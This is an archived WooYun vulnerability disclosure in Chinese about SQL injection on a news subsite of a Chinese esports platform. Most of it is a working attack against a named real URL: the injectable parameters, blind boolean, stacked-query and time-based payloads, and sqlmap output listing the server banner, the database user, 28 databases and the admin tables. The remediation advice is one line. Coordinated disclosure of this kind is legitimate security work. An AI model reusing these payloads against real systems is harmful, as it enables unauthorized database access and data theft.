乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-09-29: 细节已通知厂商并且等待厂商处理中 2014-09-30: 厂商已经确认,细节仅向厂商公开 2014-10-10: 细节向核心白帽子及相关领域专家公开 2014-10-20: 细节向普通白帽子公开 2014-10-30: 细节向实习白帽子公开 2014-11-13: 细节向公众公开
某国内大型电竞平台分站sql注入
最开始玩DOTA就是在浩方上玩的:)漏洞地址:
http://news.cga.com.cn/app/list.aspx?ItemId=13&categoryid=4
注入参数:
ItemID,categoryid
payload:
---Place: GETParameter: ItemId Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: ItemId=13) AND 6213=6213 AND (2258=2258&categoryid=4 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: ItemId=13); WAITFOR DELAY '0:0:5'--&categoryid=4 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: ItemId=13) WAITFOR DELAY '0:0:5'--&categoryid=4Place: GETParameter: categoryid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: ItemId=13&categoryid=4) AND 9641=9641 AND (4531=4531 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: ItemId=13&categoryid=4); WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: ItemId=13&categoryid=4) WAITFOR DELAY '0:0:5'-----there were multiple injection points, please select the one to use for following injections:[0] place: GET, parameter: categoryid, type: Unescaped numeric (default)[1] place: GET, parameter: ItemId, type: Unescaped numeric[q] Quit
当前库信息:
[03:16:39] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008[03:16:39] [INFO] fetching current user[03:16:39] [INFO] resumed: UnionNewWebDBUsercurrent user: 'UnionNewWebDBUser'[03:16:39] [INFO] fetching current database[03:16:39] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval[03:16:39] [INFO] retrieved: [03:16:39] [WARNING] reflective value(s) found and filtering outUnionNewscurrent database: 'UnionNews'
服务器banner信息:
banner:---Microsoft SQL Server 2008 R2 (SP1) - 10.50.2500.0 (X64) Jun 17 2011 00:54:03 Copyright (c) Microsoft Corporation Enterprise Edition (64-bit) on Windows NT 6.1 <X64> (Build 7601: Service Pack 1)---
跑库:
available databases [28]:[*] DntForum[*] HF_Maps[*] HF_Match[*] HFActivity[*] HFAwardSys[*] HFClanSys[*] HFEvent2013[*] HFEvent2013Apr[*] HFGoldenLeague[*] HFHelpSys[*] HFNetBar[*] HFReportComplain[*] HFWebApp[*] HFZhanLing[*] JDDB[*] ManagementSystem[*] master[*] model[*] msdb[*] Nest[*] pv[*] QuestionnaireSys[*] RencunBeckon[*] RencunDIY[*] RencunGift[*] tempdb[*] UnionNews[*] Woool2WebDB
跑表
[03:40:54] [INFO] retrieved: dbo.Admin[03:41:25] [INFO] retrieved: dbo.Admin_Category[03:42:05] [INFO] retrieved: dbo.Admin_Item[03:42:29] [INFO] retrieved: dbo.Admin_Permission[03:43:10] [INFO] retrieved: dbo.Admin_Tag[03:43:28] [INFO] retrieved: dbo.Admin_Template[03:44:04] [INFO] retrieved: dbo.AspNet_SqlCacheTablesForChangeNotification[03:46:28] [INFO] retrieved: dbo.Category[03:47:05] [INFO] retrieved: dbo.comd_list[03:47:40] [INFO] retrieved: dbo.Item[03:47:59] [INFO] retrieved: dbo.jiaozhu[03:48:30] [INFO] retrieved: dbo.lunhui[03:48:57] [INFO] retrieved: dbo.News[03:49:18] [INFO] retrieved: dbo.News_Comment[03:49:49] [INFO] retrieved: dbo.News_v[03:50:00] [INFO] retrieved: dbo.Pic[03:50:16] [INFO] retrieved: dbo.Reg_Arrt[03:50:45] [INFO] retrieved: dbo.Tag[03:51:01] [INFO] retrieved: dbo.Template[03:51:29] [INFO] retrieved: dbo.Vote[03:51:44] [INFO] retrieved: dbo.Vote_items[03:52:13] [INFO] retrieved: dbo.Vote_logsDatabase: UnionNews[22 tables]+--------------------------------------------+| Admin || Admin_Category || Admin_Item || Admin_Permission || Admin_Tag || Admin_Template || AspNet_SqlCacheTablesForChangeNotification || Category || Item || News || News_Comment || News_v || Pic || Reg_Arrt || Tag || Template || Vote || Vote_items || Vote_logs || comd_list || jiaozhu || lunhui |+--------------------------------------------+
好多数据表不知道干嘛的。。。继续深入下去会影响到平台玩家吗?好激动,不深入了我只是想知道挖掘机技术到底哪家强?
参数类型增加判断、过滤:)
危害等级:中
漏洞Rank:10
确认时间:2014-09-30 08:52
谢谢xyang的漏洞。
暂无